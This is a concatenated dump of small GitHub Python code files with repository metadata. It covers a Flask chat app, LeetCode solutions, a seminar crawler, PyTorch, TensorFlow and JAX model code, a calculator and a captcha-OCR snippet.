received\")\ndef fileReceived(data):\n\n # Query for username and channel name\n username = data[\"username\"]\n channelName = data[\"channelName\"]\n\n # Message is read if it is private channel\n for i in privateChannelList:\n if channelName in i:\n if i[2] == username:\n i[4] = False\n # print(username + ' read the message')\n # print(i)\n elif i[1] == username:\n i[3] = False\n # print(username + ' read the message')\n # print(i)\n\n\n# This implements a Ring Buffer of variable size.\nclass RingBuffer:\n \"\"\" class that implements a not-yet-full buffer \"\"\"\n def __init__(self,size_max):\n self.max = size_max\n self.data = []\n\n class __Full:\n \"\"\" class that implements a full buffer \"\"\"\n def append(self, x):\n \"\"\" Append an element overwriting the oldest one. \"\"\"\n self.data[self.cur] = x\n self.cur = (self.cur+1) % self.max\n def get(self):\n \"\"\" return list of elements in correct order \"\"\"\n return self.data[self.cur:]+self.data[:self.cur]\n\n def append(self,x):\n \"\"\"append an element at the end of the buffer\"\"\"\n self.data.append(x)\n if len(self.data) == self.max:\n self.cur = 0\n # Permanently change self's class from non-full to full\n self.__class__ = self.__Full\n\n def get(self):\n \"\"\" Return a list of elements from the oldest to the newest. 
\"\"\"\n return self.data\n\nif __name__ == \"__main__\":\n socketio.run(app)\n","repo_name":"Kokyuho/CS50-Web-flack","sub_path":"application.py","file_name":"application.py","file_ext":"py","file_size_in_byte":11155,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"33446482801","text":"# Definition for a binary tree node.\nclass TreeNode:\n def __init__(self, x):\n self.val = x\n self.left = None\n self.right = None\n\n\nclass Solution:\n\n def count_deep(self, root):\n if not root:\n return 0\n else:\n left_deep = self.count_deep(root.left)\n right_deep = self.count_deep(root.right)\n self.res = max(self.res, left_deep + right_deep + 1)\n return 1 + max(left_deep, right_deep)\n pass\n\n def diameterOfBinaryTree(self, root: TreeNode) -> int:\n\n self.res = 1\n\n if not root:\n return 0\n else:\n self.count_deep(root)\n\n return self.res - 1\n","repo_name":"lionheartStark/sword_towards_offer","sub_path":"leetcode/py36/二叉树的直径N543.py","file_name":"二叉树的直径N543.py","file_ext":"py","file_size_in_byte":693,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"43420935622","text":"#!/usr/bin/env python3\n# coding=utf-8\n# author=eltsai\n\nyears = [str(year) for year in range(2015, 2022)]\ndays = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']\nname='' # put your name here\n\nimport urllib.request\nfrom html_table_parser.parser import HTMLTableParser\nfrom bs4 import BeautifulSoup\n\n\ndef containsDay(string):\n if any([day in string for day in days]):\n return True\n return False\n\ndef containsName(string):\n return name in string\n\nstarter_week = \"https://secure.math.ucla.edu/seminars/weekly_list.php?t=1642287527\"\ncur = starter_week\ncount = 0\nwhile count <= 500:\n # print(count)\n count += 1\n # try:\n f = urllib.request.urlopen(cur)\n webpage = f.read().decode('utf-8')\n cur_year = 2022\n for year in years:\n if year in webpage:\n cur_year = year\n p = HTMLTableParser()\n p.feed(webpage)\n # print(year)\n date = None\n # print(p.tables[0][1:])\n for line_list in p.tables[0][1:]:\n for line in line_list:\n if containsDay(line):\n date = line\n if containsName(line):\n print(date, cur_year, line, line_list[line_list.index(line)+1])\n \n bsObj = BeautifulSoup(webpage, 'html.parser')\n\n links = bsObj.findAll('a')\n finalLinks = set()\n found = False\n link_list = []\n for link in links:\n #print(link.attrs)\n # if 'title' in link.attrs and link.attrs['title'] == 'Previous Week':\n # print(link.attrs['href'])\n if 'href' in link.attrs and '/seminars/weekly_list.php?t=' in link.attrs['href']:\n found =True\n link_list.append('https://secure.math.ucla.edu' + link.attrs['href'])\n # break\n # print(link.attrs)\n \n if len(link_list) <= 2:\n print(\"No previous week!\")\n break\n\n cur = link_list[1]\n\n# except:\n# print(f\"failed to open {starter_week}\")","repo_name":"eltsai/pythonGadgets","sub_path":"barcrawler/ucla_event_crawler.py","file_name":"ucla_event_crawler.py","file_ext":"py","file_size_in_byte":1938,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"34772633976","text":"class Solution:\n\tdef lengthLongestPath(self, input):\n\t\t# 2 pointer approach\n\t\tdef advance(ptr, input):\n\t\t\tlevel = 0\n\t\t\twhile ptr < len(input) and input[ptr] != '\\n':\n\t\t\t\tif input[ptr] == '\\t':\n\t\t\t\t\tlevel += 1\n\t\t\t\tptr += 1\n\t\t\treturn level,ptr\n\t\tstack = []\n\t\tbegin = 
0\n\t\tnum_tab = 0\n\t\tmax_length = 0\n\t\twhile begin < len(input):\n\t\t\t# advance till the next '\\n'\n\t\t\tnum_tab,end = advance(begin,input)\n\t\t\t# walk up the directory tree, if necessary\n\t\t\twhile len(stack) > num_tab:\n\t\t\t\tstack.pop()\n\t\t\t# dir/file string length\n\t\t\tlength = end-begin-num_tab\n\t\t\tif stack:\n\t\t\t\tlength += 1 # add 1 for delimiter '\\'\n\t\t\t# is this a file or dir?\n\t\t\tif '.' in input[begin:end]:\n\t\t\t\tmax_length = max(max_length, sum(stack) + length)\n\t\t\telse:\n\t\t\t\tstack.append(length)\n\t\t\t# advance pointer to start from position after '\\n'\n\t\t\tbegin = end + 1\n\t\treturn max_length\n","repo_name":"bhocoding/leetcode","sub_path":"leet388.py","file_name":"leet388.py","file_ext":"py","file_size_in_byte":843,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"11231747194","text":"import math\nimport os\nimport time\n\nimport numpy as np\nimport torch\nfrom torch.utils.data import DataLoader\n\nfrom model import (\n TextLandmarkCollate,\n TextLandmarkLoader,\n TextLandmarkLoss,\n TextLandmarkModel,\n HParams,\n)\n\n\ndef load_checkpoint(checkpoint_path, model, optimizer, scaler, scheduler):\n assert os.path.isfile(checkpoint_path)\n print(f\"Loading checkpoint '{checkpoint_path}'\")\n checkpoint_dict = torch.load(checkpoint_path, map_location=\"cpu\")\n model.load_state_dict(checkpoint_dict[\"state_dict\"])\n optimizer.load_state_dict(checkpoint_dict[\"optimizer\"])\n scaler.load_state_dict(checkpoint_dict[\"scaler\"])\n scheduler.load_state_dict(checkpoint_dict[\"scheduler\"])\n iteration = checkpoint_dict[\"iteration\"]\n val_loss = checkpoint_dict[\"val_loss\"]\n print(f\"Loaded checkpoint '{checkpoint_path}' from iteration {iteration}\")\n return val_loss, iteration\n\n\ndef save_checkpoint(model, optimizer, scaler, scheduler, iteration, val_loss, filepath):\n print(f\"Saving model and optimizer state at iteration {iteration} to {filepath}\")\n torch.save(\n {\n \"val_loss\": val_loss,\n \"iteration\": iteration,\n \"scheduler\": scheduler.state_dict(),\n \"scaler\": scaler.state_dict(),\n \"optimizer\": optimizer.state_dict(),\n \"state_dict\": model.state_dict(),\n },\n filepath,\n )\n\n\ndef validate(model, criterion, valset, batch_size, collate_fn):\n \"\"\"Handles all the validation scoring and printing\"\"\"\n model.eval()\n with torch.no_grad():\n val_loader = DataLoader(\n dataset=valset,\n sampler=None,\n num_workers=1,\n shuffle=False,\n batch_size=batch_size,\n pin_memory=False,\n collate_fn=collate_fn,\n )\n\n val_loss = 0.0\n steps = len(val_loader)\n for batch in val_loader:\n x, y = model.parse_batch(batch)\n y_pred = model(x)\n loss = criterion(y_pred, y)\n reduced_val_loss = loss.item()\n val_loss += reduced_val_loss\n val_loss /= steps\n\n model.train()\n return val_loss\n\n\ndef main(hparams, checkpoint_path=None):\n \"\"\"Training and validation logging results to tensorboard and stdout\n\n Params\n ------\n hparams (object): comma separated list of \"name=value\" pairs.\n checkpoint_path(string): checkpoint path\n \"\"\"\n torch.manual_seed(hparams.seed)\n torch.cuda.manual_seed(hparams.seed)\n\n # Initialise model with pretrained weights and freeze\n model = TextLandmarkModel(hparams)\n if torch.cuda.is_available():\n model = model.cuda()\n\n if hparams.fp16_run:\n model.decoder.xyz.attention_layer.score_mask_value = np.finfo(\"float16\").min\n model.decoder.mel.attention_layer.score_mask_value = np.finfo(\"float16\").min\n\n # Setup data 
loaders\n    trainset = TextLandmarkLoader()\n    valset = TextLandmarkLoader(train=False)\n    collate_fn = TextLandmarkCollate()\n    train_loader = DataLoader(\n        dataset=trainset,\n        num_workers=1,\n        shuffle=True,\n        sampler=None,\n        batch_size=hparams.batch_size,\n        pin_memory=False,\n        drop_last=True,\n        collate_fn=collate_fn,\n    )\n\n    # Load checkpoint if one exists\n    best = 100\n    iteration = 0\n    epoch_offset = 0\n    optimizer = torch.optim.Adam(\n        params=model.parameters(),\n        lr=hparams.learning_rate,\n        weight_decay=hparams.weight_decay,\n    )\n    scheduler = torch.optim.lr_scheduler.OneCycleLR(\n        optimizer,\n        max_lr=hparams.learning_rate,\n        steps_per_epoch=len(train_loader),\n        epochs=hparams.epochs,\n    )\n    scaler = torch.cuda.amp.GradScaler(enabled=hparams.fp16_run)\n    criterion = TextLandmarkLoss()\n\n    if checkpoint_path is not None:\n        best, iteration = load_checkpoint(\n            checkpoint_path, model, optimizer, scaler, scheduler\n        )\n        epoch_offset = max(0, int(iteration / len(train_loader)))\n\n    model.train()\n    # ================ MAIN TRAINING LOOP! ===================\n    for epoch in range(epoch_offset, hparams.epochs):\n        print(f\"Epoch: {epoch}\")\n        for batch in train_loader:\n            start = time.perf_counter()\n            model.zero_grad()\n            with torch.cuda.amp.autocast():\n                x, y = model.parse_batch(batch)\n                y_pred = model(x)\n                loss = criterion(y_pred, y)\n\n            reduced_loss = loss.item()\n            scaler.scale(loss).backward()\n\n            scaler.unscale_(optimizer)\n            grad_norm = torch.nn.utils.clip_grad_norm_(\n                parameters=model.parameters(),\n                max_norm=hparams.grad_clip_thresh,\n            )\n\n            scaler.step(optimizer)\n            scaler.update()\n            optimizer.zero_grad()\n            scheduler.step()\n\n            iteration += 1\n            duration = time.perf_counter() - start\n            print(\n                f\"Train loss {iteration} {reduced_loss:.6f} \"\n                f\"Grad Norm {grad_norm:.6f} {duration:.2f}s/it\"\n            )\n\n            if iteration % hparams.iters_per_checkpoint == 0:\n                val_loss = validate(\n                    model, criterion, valset, hparams.batch_size, collate_fn\n                )\n                print(f\"Validation loss {iteration}: {val_loss:9f}\")\n                if val_loss < best and not math.isnan(grad_norm):\n                    save_checkpoint(\n                        model,\n                        optimizer,\n                        scaler,\n                        scheduler,\n                        iteration,\n                        val_loss,\n                        \"best.pt\",\n                    )\n                    best = val_loss\n\n\nif __name__ == \"__main__\":\n    hparams = HParams(\n        n_landmark_xyz=60,\n        # max_decoder_steps=240,\n        # epochs=50,\n        iters_per_checkpoint=50,\n        learning_rate=2e-3,\n        batch_size=8,\n        fp16_run=True,\n    )\n\n    torch.backends.cudnn.enabled = hparams.cudnn_enabled\n    torch.backends.cudnn.benchmark = hparams.cudnn_benchmark\n\n    print(\"FP16 Run:\", hparams.fp16_run)\n    print(\"cuDNN Enabled:\", hparams.cudnn_enabled)\n    print(\"cuDNN Benchmark:\", hparams.cudnn_benchmark)\n\n    main(hparams)\n","repo_name":"sweatybridge/text-to-anime","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":6308,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"76"} +{"seq_id":"23414811126","text":"from django.conf.urls import patterns, url\nfrom django.contrib import admin\n\nadmin.autodiscover()\n\nurlpatterns = patterns('arbor.views',\n    url(r'^$', 'arbor_index', name='arbor_index'),\n    url(r'api/geocode/$', 'arbor_api_geocode', name='arbor_api_geocode'),\n    url(r'api/image/$', 'arbor_api_botanical_image', name='arbor_api_botanical_image'),\n    url(r'comments/list/$', 'arbor_comments_list', name='arbor_comments_list'),\n    url(r'comments/add/$', 'arbor_comments_add', 
name='arbor_comments_add'),\n)\n\n","repo_name":"hohenstaufen/ustmat","sub_path":"ustmat/arbor/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":510,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"39471353808","text":"import numpy as np\n\nclass Perturb:\n \"\"\"\n A simple perturb mechanism as specified in (Jaderberg et al., 2017).\n \"\"\"\n def __init__(self, cs_space=None, boundaries={}):\n self.boundaries = boundaries\n self.cs_space = cs_space\n \n def __call__(self, hyperparameters: dict) -> dict:\n \"\"\"\n Perturb the nodes in the input.\n :param hyperparameters: A dict with nodes.\n :return: The perturbed nodes.\n \"\"\" \n result = hyperparameters.copy()\n\n for key in hyperparameters:\n temp_value = self.cs_space[key]._inverse_transform(result[key])\n temp_value += np.random.choice([-1, 1]) * 0.2 * temp_value\n result[key] = self.cs_space[key]._transform(temp_value)\n self.ensure_boundaries(result)\n return result\n\n def ensure_boundaries(self, result):\n for key in result:\n if key not in self.boundaries:\n continue\n if result[key] < self.boundaries[key][0]:\n result[key] = self.boundaries[key][0]\n elif result[key] > self.boundaries[key][1]:\n result[key] = self.boundaries[key][1]\n","repo_name":"automl/HPO_for_RL","sub_path":"pbt/exploration/perturb.py","file_name":"perturb.py","file_ext":"py","file_size_in_byte":1170,"program_lang":"python","lang":"en","doc_type":"code","stars":14,"dataset":"github-code","pt":"76"} +{"seq_id":"21726370759","text":"import os\nimport sys\nimport time\n#^^^^^^^^^^^^^^^^^^^^^^^^^\n#these are required libraries, used for different things such as clearing console, making the program sleep/pause for a period of time, etc.\n\n#basic code to assist you in learning the basics of python.\n#i included notes to tell you what everything does.\n\n#basic terms are below:\n#if (if a condition is met)\n#elif (else if, if the 'if' condition is not met, it will look for another condition)\n#else (else, essentially if all other if/elif statements are not met, it will continue with the code under this)\n\n#important knowledge below:\n#indentations are super important, you need to learn them very quickly, tabs make a huge difference in python.\n\ndef main():\n\tos.system('cls') \n\tprint(\"\"\"\n\t\tepic math python script\n\n\t\t1 / add / + | addition\n\n\t\tgithub.com/joshuadupont\n\n\t\"\"\") #outputs the base message to console, what you see when you run the script.\n\n\tmathC = input(\"What operation would you like to use? 
\") #asks the user for an input, which is used below this\n\n\tif mathC == \"1\" or mathC == \"add\" or mathC == \"+\": #filters out the users input, if the users input is what is in the quotes, it will then proceed to go on to other code.\n\t\taInput1 = int(input(\"Number 1: \")) #user input code, asks the user for input (its also a integer input, so the input will be used as integers, for this script it is required, unless you want to convert them afterwards, which i do not recommend for something so small.)\n\t\taInput2 = int(input(\"Number 2: \")) #user input code, asks the user for input (its also a integer input, so the input will be used as integers, for this script it is required, unless you want to convert them afterwards, which i do not recommend for something so small.)\n\t\tadditionResults = aInput1 + aInput2 #the sum of both numbers, \n\t\tprint(f'The sum of {aInput1} + {aInput2} is:\\n{additionResults}')\n\t\ttime.sleep(5) #puts the program to sleep for 5 seconds, aka pauses the program. \n\t\tmain() #calls back to the main definition, pretty much resets the whole thing.\n\t\n\telse: #if the input does not match one of the conditions/choices in quotes in the if statement, it will go to this chunk of code. \n\t\tprint(\"Please input a valid operation.\") #outputs to console that the choice is invalid.\n\t\ttime.sleep(5) #puts the program to sleep for 5 seconds, aka pauses the program. \n\t\tmain() #calls back to the main definition, pretty much resets the whole thing.\n\nmain() #starts the program, if i were to not include a def() main:, then we would not need to do this.","repo_name":"joshuadupont/py-calculator","sub_path":"p.py","file_name":"p.py","file_ext":"py","file_size_in_byte":2527,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"76"} +{"seq_id":"115572358","text":"#!/usr/bin/env python\n\nfrom __future__ import print_function\n\nimport os\nimport sys\nimport subprocess\n\ndef main(argv=sys.argv[1:]):\n working_dir = argv[0]\n tests = argv[1:]\n print(\"Working directory: {}\".format(working_dir))\n print(\"Running tests: \", tests)\n\n test_dir = working_dir + \"/test_results\"\n if not os.path.exists(test_dir):\n os.makedirs(test_dir)\n\n for the_file in os.listdir(test_dir):\n file_path = os.path.join(test_dir, the_file)\n try:\n if os.path.isfile(file_path):\n os.unlink(file_path)\n except Exception as e:\n print(e)\n\n commands = []\n\n for cmd in tests:\n test_cmd = \"./\" + cmd + \" --gtest_output=xml:\" + working_dir + \"/test_results/\"\n print(\"Running: \", test_cmd)\n rc = subprocess.call(test_cmd, cwd=working_dir, shell=True)\n if rc == True : #in case of test failure\n sys.exit(1)\n\n commands.insert(0, test_cmd)\n\n print(\"Ran the following commands: \")\n for cmd in commands:\n print(\"-- \", cmd)\n\nif __name__ == '__main__':\n sys.exit(main())\n","repo_name":"ethz-adrl/control-toolbox","sub_path":"ct/run_tests.py","file_name":"run_tests.py","file_ext":"py","file_size_in_byte":1093,"program_lang":"python","lang":"en","doc_type":"code","stars":1242,"dataset":"github-code","pt":"76"} +{"seq_id":"23040231182","text":"import numpy as np\nimport tensorflow as tf\nfrom tensorflow.python.eager.backprop import GradientTape\n\n# ex 1\n\nx = tf.Variable(3.0)\n\nwith tf.GradientTape() as tape:\n y = x**2\n\ndy_dx = tape.gradient(y, x)\ndy_dx.numpy()\n\n\n# ex 2\n\nw = tf.Variable(tf.random.normal((3, 2)), name=\"w\")\nb = tf.Variable(tf.zeros(2, dtype=tf.float32), name=\"b\")\nx = [[1., 2., 3.]]\n\nwith 
tf.GradientTape() as tape:\n    y = x @ w + b\n    loss = tf.reduce_mean(y**2)\n    \n[dl_w, dl_b] = tape.gradient(loss, [w, b])\n\n# ex 3\n\nlayer = tf.keras.layers.Dense(2, activation=\"relu\")\nx = tf.constant([[1., 2., 3.]])\n\nwith tf.GradientTape() as tape:\n    y = layer(x)\n    loss = tf.reduce_mean(y**2)\n\ngrad = tape.gradient(loss, layer.trainable_variables)\n\n# ex 4\n\nx = tf.constant(3.0)\nwith tf.GradientTape() as tape:\n    tape.watch(x)\n    y = x**2\n\ndx = tape.gradient(y, x)","repo_name":"aqqosh/ml_algorithms","sub_path":"basics/autodiff.py","file_name":"autodiff.py","file_ext":"py","file_size_in_byte":837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"16959462042","text":"## -------\n## Imports\n\nimport re\n\n\n## -----\n## Class\n\nclass Arguments:\n    \"\"\"\n    Class that contains command-line arguments in a neat format.\n    @author Carlos L. Cuenca\n    \"\"\"\n\n    ## -------------\n    ## Static Fields\n\n    Log = None\n\n    ## --------------\n    ## Static Methods\n\n    @staticmethod\n    def parse_from(arguments: list) -> dict:\n        \"\"\"\n        Reads in the arguments from the list and groups the contents into key-value pairs\n        :param arguments: The string arguments to parse\n        :return: dictionary containing the arguments\n        \"\"\"\n\n        # Initialize the result\n        result = {}\n        index = 0\n\n        # Iterate through the range of arguments\n        while index < len(arguments):\n\n            # If we have an argument\n            if arguments[index] is not None and arguments[index].startswith('-'):\n\n                # Initialize the key, argument & increment the index\n                key = re.sub(r'-+', '', arguments[index])\n                index += 1\n\n                # Check if the key is in the collection\n                if key not in result:\n                    # Initialize the argument to None\n                    result[key] = None\n\n                # Sub-iterate\n                while index < len(arguments) and not arguments[index].startswith('-'):\n\n                    # Check if we have a key\n                    if result[key] is None:\n\n                        # Initialize the argument\n                        result[key] = arguments[index]\n\n                    # Otherwise\n                    else:\n\n                        # If the value is not already a list\n                        if not isinstance(result[key], list):\n                            # Reset the value\n                            result[key] = [result[key]]\n\n                        # Append the current argument\n                        result[key].append(arguments[index])\n\n                    # Increment the index\n                    index += 1\n\n            # Otherwise\n            else:\n\n                # Increment the index\n                index += 1\n\n        # Finally, return the result\n        return result\n\n    ## ---------\n    ## Overloads\n\n    def __init__(self, arguments, required):\n        \"\"\"\n        Initializes the Arguments instance to its default state.\n        :param arguments: The arguments list to parse\n        \"\"\"\n\n        # Initialize the collection\n        self.dictionary = Arguments.parse_from(arguments)\n        self.count = len(self.dictionary)\n\n        # If we have required arguments\n        if required is not None:\n\n            # Check the required arguments\n            for argument in required:\n\n                # Check\n                if argument not in self.dictionary:\n\n                    # Log the error\n                    if Arguments.Log is not None: Arguments.Log.Error(f'Error: Required argument \\'{argument}\\' not specified.')\n\n    def __dict__(self):\n        \"\"\"\n        Returns the dict representation of the Arguments instance\n        :return: dict containing the arguments as key-value pairs\n        \"\"\"\n\n        return self.dictionary\n\n    def __getitem__(self, item):\n        \"\"\"\n        Returns the value corresponding with the specified item\n        :param item: The key corresponding to the value to retrieve\n        :return: The value corresponding with the key\n        \"\"\"\n\n        return 
self.dictionary[item]\n","repo_name":"clcuenca/graph-service","sub_path":"lib/mlscripts/arguments.py","file_name":"arguments.py","file_ext":"py","file_size_in_byte":3417,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"554475525","text":"from collections import defaultdict\nfrom typing import List\n\nclass Solution:\n    def doDFS(self,graph,visited,root,target,prod):\n        print(\"STEP:\",root,target)\n        ret = -1\n        if target in graph[root]:\n            return prod*graph[root][target]\n        \n        neighbours = graph[root]\n        visited.add(root)\n        \n        for n,v in neighbours.items():\n            if n not in visited:\n                print(\"Multi\",n,graph[root][n] )\n                ret = self.doDFS(graph,visited,n,target,prod*graph[root][n])\n                if ret!=-1:\n                    break\n        \n        return ret\n    \n    \n    \n    def calcEquation(self, eq: List[List[str]], values: List[float], queries: List[List[str]]) -> List[float]:\n        \n        \n        graph = defaultdict(dict)\n        \n        for i in range(len(eq)):\n            graph[eq[i][0]][eq[i][1]] = values[i]\n            \n            graph[eq[i][1]][eq[i][0]]=1/values[i]\n        \n        print(graph)\n        \n        results = []\n        for q in queries:\n            print(q)\n            if q[0] not in graph or q[1] not in graph:\n                results.append(-1)\n            \n            elif q[0] == q[1]:\n                # print('ye:',q)\n                results.append(1) \n            \n            else:\n                visited = set()\n                print(\"FOR\",q)\n                results.append(self.doDFS(graph,visited,q[0],q[1],1))\n        \n        return(results)\n    \n    \n    \n    ","repo_name":"DhruvSrivastava-16/LEETCODE-PRACTISE-","sub_path":"evaluate-division/evaluate-division.py","file_name":"evaluate-division.py","file_ext":"py","file_size_in_byte":1500,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"34065309157","text":"# -*- coding: utf-8 -*-\n# @Time : 2018/11/15 16:43\n# @Author : Philly\n# @Site : \n# @File : parse_captcha.py\n# @Software : PyCharm Community Edition\nfrom lxml.html import fromstring\nimport requests\nfrom io import BytesIO\nfrom PIL import Image\nimport base64\nimport pytesseract\n\ndef parse_form(html):\n    tree = fromstring(html)\n    data = {}\n    for e in tree.cssselect('form input'): # pip install cssselect\n        if e.get('name'):\n            data[e.get('name')] = e.get('value')\n    return data\n\ndef get_captcha_img(html):\n    tree = fromstring(html)\n    img_data = tree.cssselect('div img#verifyCode')[0].get('src') # cssselect returns a list, take the first match\n    # img_data = img_data.partition(',')[-1]\n    binary_img_data = base64.b64decode(img_data)\n    img = Image.open(BytesIO(binary_img_data))\n    return img\n\nif __name__ == '__main__':\n    html = requests.get('http://192.168.14.38:88/User/Login')\n    form = parse_form(html.content)\n    print(form)\n\n    img = get_captcha_img(html.content)\n    tessdata_dir_config = '--tessdata-dir \"D:\\\\testsoft\\\\Tesseract-OCR\\\\tessdata\"'\n    pytesseract.image_to_string(img, config=tessdata_dir_config) # pass as config=; the second positional argument is lang\n","repo_name":"qi7q/NIPauto","sub_path":"captcha/parse_captcha.py","file_name":"parse_captcha.py","file_ext":"py","file_size_in_byte":1113,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"76"} +{"seq_id":"45314144033","text":"\"\"\"\n\"\"\"\n\nimport bpy\n\nactiveOb = bpy.context.view_layer.objects.active\ngrpExists = False\n\nif bpy.context.active_object is not None:\n    grpName = bpy.context.active_object.name + \"_grp\"\n\n    for grp in bpy.data.groups:\n        if grp.name == grpName:\n            grpExists = True\n\n    if grpExists == False:\n        bpy.ops.group.create(name=grpName)\n\n    for ob in bpy.context.selected_objects:\n        bpy.context.view_layer.objects.active = ob\n        bpy.ops.object.group_link(group=grpName)\n\nbpy.context.view_layer.objects.active = 
activeOb\n","repo_name":"WeisongZhao/MyWeb2","sub_path":"collections/groups_deprecated_2.7/group_Name_Active.py","file_name":"group_Name_Active.py","file_ext":"py","file_size_in_byte":545,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"76"} +{"seq_id":"4613238978","text":"\nimport time\nimport threading\nimport sys\nfrom .obd import OBDEmulator\nfrom .OBDResponse import OBDResponse\n\n\"\"\" class to make asynchronous queries \"\"\"\nclass Async(OBDEmulator):\n\n    def __init__(self, delay_cmds=0.25):\n        super().__init__()\n        self.__thread = None\n        self.__commands = {} # key = OBDCommand, value = Response\n        self.__callbacks = {} # key = OBDCommand, value = list of Functions\n        self.__running = False\n        self.__was_running = False\n        self.__delay_cmds = delay_cmds\n\n    @property\n    def running(self):\n        return self.__running\n\n    def start(self):\n        \"\"\" Starts the async update loop \"\"\"\n\n        if len(self.__commands) == 0:\n            sys.exit('Async thread not started because no commands were registered')\n\n        if self.__thread is None:\n            print(\"Starting async thread\")\n            self.__running = True\n            self.__thread = threading.Thread(target=self.run)\n            self.__thread.daemon = True\n            self.__thread.start()\n\n    def stop(self):\n        \"\"\" Stops the async update loop \"\"\"\n        if self.__thread is not None:\n            print(\"Stopping async thread...\")\n            self.__running = False\n            self.__thread.join()\n            self.__thread = None\n            print(\"Async thread stopped\")\n\n    def paused(self):\n        \"\"\"\n        A stub function for semantic purposes only\n        enables code such as:\n\n        with connection.paused() as was_running\n            ...\n        \"\"\"\n        return self\n\n    def __enter__(self):\n        \"\"\"\n        pauses the async loop,\n        while recording the old state\n        \"\"\"\n        self.__was_running = self.__running\n        self.stop()\n        return self.__was_running\n\n    def __exit__(self, exc_type, exc_value, traceback):\n        \"\"\"\n        resumes the update loop if it was running\n        when __enter__ was called\n        \"\"\"\n        if not self.__running and self.__was_running:\n            self.start()\n\n        return False # don't suppress any exceptions\n\n    def close(self):\n        \"\"\" Closes the connection \"\"\"\n        self.stop()\n        super(Async, self).close()\n\n    def watch(self, c, callback=None):\n        \"\"\"\n        Subscribes the given command for continuous updating. Once subscribed,\n        query() will return that command's latest value. Optional callbacks can\n        be given, which will be fired upon every new value.\n        \"\"\"\n\n        # the dict shouldn't be changed while the daemon thread is iterating\n        if self.__running:\n            print(\"Can't watch() while running, please use stop()\")\n        else:\n\n            # new command being watched, store the command\n            if c not in self.__commands:\n                print(f\"Watching command: {str(c)}\")\n\n                # TODO: still need to implement OBDResponse()\n                self.__commands[c] = OBDResponse() # give it an initial value\n                self.__callbacks[c] = [] # create an empty list\n\n            # if a callback was given, push it\n            if hasattr(callback, \"__call__\") and (callback not in self.__callbacks[c]):\n                print(f\"subscribing callback for command: {str(c)}\")\n                self.__callbacks[c].append(callback)\n\n    def unwatch(self, c, callback=None):\n        \"\"\"\n        Unsubscribes a specific command (and optionally, a specific callback)\n        from being updated. 
If no callback is specified, all callbacks for\n that command are dropped.\n \"\"\"\n\n # the dict shouldn't be changed while the daemon thread is iterating\n if self.__running:\n print(\"Can't unwatch() while running, please use stop()\")\n else:\n print(f\"Unwatching command: {str(c)}\")\n\n if c in self.__commands:\n # if a callback was specified, only remove the callback\n if hasattr(callback, \"__call__\") and (callback in self.__callbacks[c]):\n self.__callbacks[c].remove(callback)\n\n # if no more callbacks are left, remove the command entirely\n if len(self.__callbacks[c]) == 0:\n self.__commands.pop(c, None)\n else:\n # no callback was specified, pop everything\n self.__callbacks.pop(c, None)\n self.__commands.pop(c, None)\n\n def query(self, c, force=False):\n \"\"\"\n Non-blocking query().\n Only commands that have been watch()ed will return valid responses\n \"\"\"\n\n if c in self.__commands:\n return self.__commands[c]\n else:\n return OBDResponse()\n\n def run(self):\n \"\"\" Daemon thread \"\"\"\n\n # loop until the stop signal is received\n while self.__running:\n\n if len(self.__commands) > 0:\n # loop over the requested commands, send, and collect the response\n for c in self.__commands:\n\n # force, since commands are checked for support in watch()\n r = super(Async, self).query(c)\n\n # store the response\n self.__commands[c] = r\n\n # fire the callbacks, if there are any\n for callback in self.__callbacks[c]:\n callback(r)\n time.sleep(self.__delay_cmds)\n\n else:\n time.sleep(0.25) # idle","repo_name":"5g-mobility/car-communication","sub_path":"obd_emulator/asynchronous.py","file_name":"asynchronous.py","file_ext":"py","file_size_in_byte":5493,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"76"} +{"seq_id":"31921024156","text":"\"\"\"Define Cubic Spline map for Variational Meta-Posteriors\"\"\"\n\nimport math\n\nimport haiku as hk\nimport jax\nfrom jax import numpy as jnp\n\nfrom modularbayes._src.typing import Array, List, Optional\n\n\nclass MLPVmpMap(hk.Module):\n \"\"\"Trainable mapping from eta to normalizing flow parameters.\"\"\"\n\n def __init__(\n self,\n params_flow_init: hk.Params,\n hidden_sizes: List[int],\n name: Optional[str] = None,\n ):\n super().__init__(name=name)\n\n # Variational parameters to be produced\n # Tree definition\n leaves, self.params_flow_treedef = jax.tree_util.tree_flatten(\n params_flow_init)\n self.params_flow_shapes = [x.shape for x in leaves]\n # Total number of output paramemters by the vmp\n self.output_dim = sum(x.flatten().shape[0] for x in leaves)\n\n self.hidden_sizes = hidden_sizes\n\n def __call__(self, eta: Array) -> List[hk.Params]:\n assert eta.ndim == 2\n\n num_eta_new, _ = eta.shape\n\n vmp_map = hk.Sequential([\n hk.Flatten(preserve_dims=-1),\n hk.nets.MLP(\n output_sizes=self.hidden_sizes,\n activate_final=True,\n ),\n hk.Linear(output_size=self.output_dim),\n ])\n flow_params_merged = jax.vmap(vmp_map)(eta)\n\n # out1 = hk.Flatten(preserve_dims=-1)(eta)\n # out1 = hk.nets.MLP(\n # self.hidden_sizes,\n # activate_final=True,\n # )(\n # out1)\n # out2 = hk.Flatten(preserve_dims=-1)(eta)\n # out2 = hk.nets.MLP(\n # self.hidden_sizes[-1:],\n # activate_final=True,\n # )(\n # out2)\n # flow_params_merged = 